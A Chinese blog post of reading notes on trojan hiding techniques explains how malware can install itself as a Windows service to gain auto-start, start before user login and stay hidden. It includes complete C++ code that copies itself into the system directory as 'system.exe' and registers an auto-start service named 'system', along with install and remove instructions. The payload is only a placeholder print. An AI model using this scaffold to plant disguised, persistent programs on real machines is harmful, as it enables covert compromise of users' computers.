木马隐藏技术(2) -- 服务
此为《木马技术揭秘与防御》系列读书笔记
windows 服务
包括四大部分:
- 服务控制管理器 Service Control management
- 服务控制程序 Service Control Program
- 服务程序 Service Program
- 服务配置程序 Service Configuration Program
使用服务的好处:
- 可以“自启动”,多了一种自启动方式
- 在用户登录前开始运行,可以在服务启动时加入杀防火墙的代码
- 在后台运行,不容易被用户发现
常用Windows API:
SC_HANDLE WINAPI OpenSCManager(
__in_opt LPCTSTR lpMachineName, // If the pointer is NULL or points to an empty string, the function connects to the service control manager on the local computer.
__in_opt LPCTSTR lpDatabaseName, // 数据库 If it is NULL, the SERVICES_ACTIVE_DATABASE database is opened by default.
__in DWORD dwDesiredAccess // SC_MANAGER_ALL_ACCESS
);
SCManager:服务控制管理器
包含几方面的信息:
1.已安装服务数据库:在注册表中拥有一个已安装服务的数据库,位于:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services
2.自启动服务:系统启动时,SCManager 启动所有启动类型为“自动”的服务,和相关依赖服务。在注册表中的位置为:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceGroupOrder
3.服务记录列表:包含每个服务的一堆属性
4.因要求而启动的服务、服务控制管理器句柄 等等。
SERVICE_STATUS_HANDLE WINAPI RegisterServiceCtrlHandler( //Registers a function to handle service control requests.
__in LPCTSTR lpServiceName,
__in LPHANDLER_FUNCTION lpHandlerProc
);
注册处理服务控制请求的函数指针
BOOL WINAPI SetServiceStatus( // Updates the service control manager's status information for the calling service.
__in SERVICE_STATUS_HANDLE hServiceStatus,
__in LPSERVICE_STATUS lpServiceStatus
);
设置服务的状态,SERVICE_STATUS 结构体的成员真多,不过大部分给默认值0就可以了。
SC_HANDLE WINAPI CreateService(
__in SC_HANDLE hSCManager, //利用 OpenSCManager 获得SCManager句柄
__in LPCTSTR lpServiceName, // 自己定义,作为服务名显示
__in_opt LPCTSTR lpDisplayName, // 自己定义,出现在服务的描述栏
__in DWORD dwDesiredAccess, // 给 SC_MANAGER_ALL_ACCESS
__in DWORD dwServiceType,
__in DWORD dwStartType,
__in DWORD dwErrorControl,
__in_opt LPCTSTR lpBinaryPathName,
__in_opt LPCTSTR lpLoadOrderGroup,
__out_opt LPDWORD lpdwTagId,
__in_opt LPCTSTR lpDependencies,
__in_opt LPCTSTR lpServiceStartName,
__in_opt LPCTSTR lpPassword
);
创建服务。
代码示例:
View Code
1 #include <iostream> 2 #include <windows.h> 3 #include <string> 4 #include <string.h> 5 #include <winsvc.h> 6 7 using namespace std; 8 9 BOOL InstallCmdService(); 10 void RemoveCmdService(); 11 void WINAPI ServiceMain(DWORD,LPTSTR *); 12 void WINAPI ServiceCtrlHandle(DWORD); 13 void door(); 14 15 SERVICE_STATUS m_ServiceStatus; 16 SERVICE_STATUS_HANDLE m_ServiceStatusHandle; 17 BOOL bRunning = true; 18 19 int main(int argc,char* argv[]) 20 { 21 SERVICE_TABLE_ENTRYA DispatchTable[] = 22 { 23 {"system",ServiceMain}, 24 {NULL,NULL} 25 }; 26 27 if(2 == argc){ 28 if(!stricmp(argv[1],"-i")){ 29 InstallCmdService(); 30 } 31 if(!stricmp(argv[1],"-r")){ 32 RemoveCmdService(); 33 } 34 } 35 StartServiceCtrlDispatcher(DispatchTable); 36 return 0; 37 } 38 39 void WINAPI ServiceMain(DWORD dwArgc,LPTSTR * lpArgv) 40 { 41 m_ServiceStatus.dwCheckPoint = 0; 42 m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE; 43 m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING; 44 m_ServiceStatus.dwServiceSpecificExitCode = 0; 45 m_ServiceStatus.dwServiceType = SERVICE_WIN32; 46 m_ServiceStatus.dwWaitHint = 0; 47 m_ServiceStatus.dwWin32ExitCode = 0; 48 49 m_ServiceStatusHandle = RegisterServiceCtrlHandler("system",ServiceCtrlHandle); 50 if(m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0){ 51 return; 52 } 53 m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; 54 m_ServiceStatus.dwCheckPoint = 0; 55 m_ServiceStatus.dwWaitHint = 0; 56 if(SetServiceStatus(m_ServiceStatusHandle,&m_ServiceStatus)){ 57 bRunning = true; 58 } 59 door(); 60 } 61 62 void WINAPI ServiceCtrlHandle(DWORD Opcode) 63 { 64 switch(Opcode){ 65 case SERVICE_CONTROL_PAUSE: 66 m_ServiceStatus.dwCurrentState = SERVICE_PAUSED; 67 break; 68 case SERVICE_CONTROL_CONTINUE: 69 m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; 70 break; 71 case SERVICE_CONTROL_STOP: 72 m_ServiceStatus.dwWin32ExitCode = 0; 73 m_ServiceStatus.dwCurrentState = SERVICE_STOPPED; 74 m_ServiceStatus.dwCheckPoint = 0; 75 m_ServiceStatus.dwWaitHint = 0; 76 SetServiceStatus(m_ServiceStatusHandle,&m_ServiceStatus); 77 bRunning = false; 78 break; 79 case SERVICE_CONTROL_INTERROGATE: 80 break; 81 } 82 } 83 84 BOOL InstallCmdService() 85 { 86 char strDir[1024]; 87 SC_HANDLE schSCManager,schService; 88 89 GetCurrentDirectory(1024,strDir); 90 // If first parameter is NULL, GetModuleFileName retrieves the path of the executable file of the current process. 91 GetModuleFileName(NULL,strDir,sizeof(strDir)); 92 93 char chSysPath[1024]; 94 GetSystemDirectory(chSysPath,sizeof(chSysPath)); 95 strcat(chSysPath,"\\system.exe"); 96 97 cout<<"strdir:"<<strDir<<endl; 98 cout<<"sysPath:"<<chSysPath<<endl; 99 if(CopyFile(strDir,chSysPath,false)){ 100 cout<<"Copy file success!"<<endl; 101 } 102 strcpy(strDir,chSysPath); 103 schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS); 104 if(schSCManager == NULL){ 105 cout<<"open scmanager failed! may be you have no privilege to do this."<<endl; 106 return false; 107 } 108 109 LPCSTR lpBinaryPathName = strDir; 110 schService = CreateService(schSCManager,"system","system",SC_MANAGER_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_NORMAL,lpBinaryPathName, 111 NULL,NULL,NULL,NULL,NULL); 112 113 if(schService){ 114 cout<<"install service success!"<<endl; 115 }else{ 116 return false; 117 } 118 CloseServiceHandle(schService); 119 return true; 120 } 121 122 void RemoveCmdService() 123 { 124 SC_HANDLE scm,service; 125 char name[100]; 126 SERVICE_STATUS status; 127 strcpy(name,"system"); 128 129 if((scm = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS)) == NULL){ 130 cout<<"OpenSCManager Error"<<endl; 131 } 132 133 service = OpenService(scm,name,SC_MANAGER_ALL_ACCESS|DELETE); 134 if(!service){ 135 cout<<"OpenService Failed"<<endl; 136 } 137 138 BOOL bSuccess = QueryServiceStatus(service,&status); 139 if(!bSuccess){ 140 cout<<"QueryServiceStatus ERROR"<<endl; 141 } 142 143 if(status.dwCurrentState != SERVICE_STOPPED){ 144 bSuccess = ControlService(service,SERVICE_CONTROL_STOP,&status); 145 if(!bSuccess){ 146 cout<<"ControlService ERROR!"<<endl; 147 } 148 Sleep(500); 149 } 150 151 bSuccess = DeleteService(service); 152 if(!bSuccess){ 153 cout<<"delete service error"<<endl; 154 }else{ 155 cout<<"delete service success!"<<endl; 156 } 157 158 CloseServiceHandle(service); 159 CloseServiceHandle(scm); 160 } 161 162 void door() 163 { 164 cout<<"hi, trojan is running, haha!"<<endl; 165 }
使用方法:
编译的程序为hi.exe
1.安装服务:hi -i
hi.exe会被copy到%system%路径下,并命名为system.exe。安装的服务名为system
2.启动服务:net start system
3.卸载服务:hi -r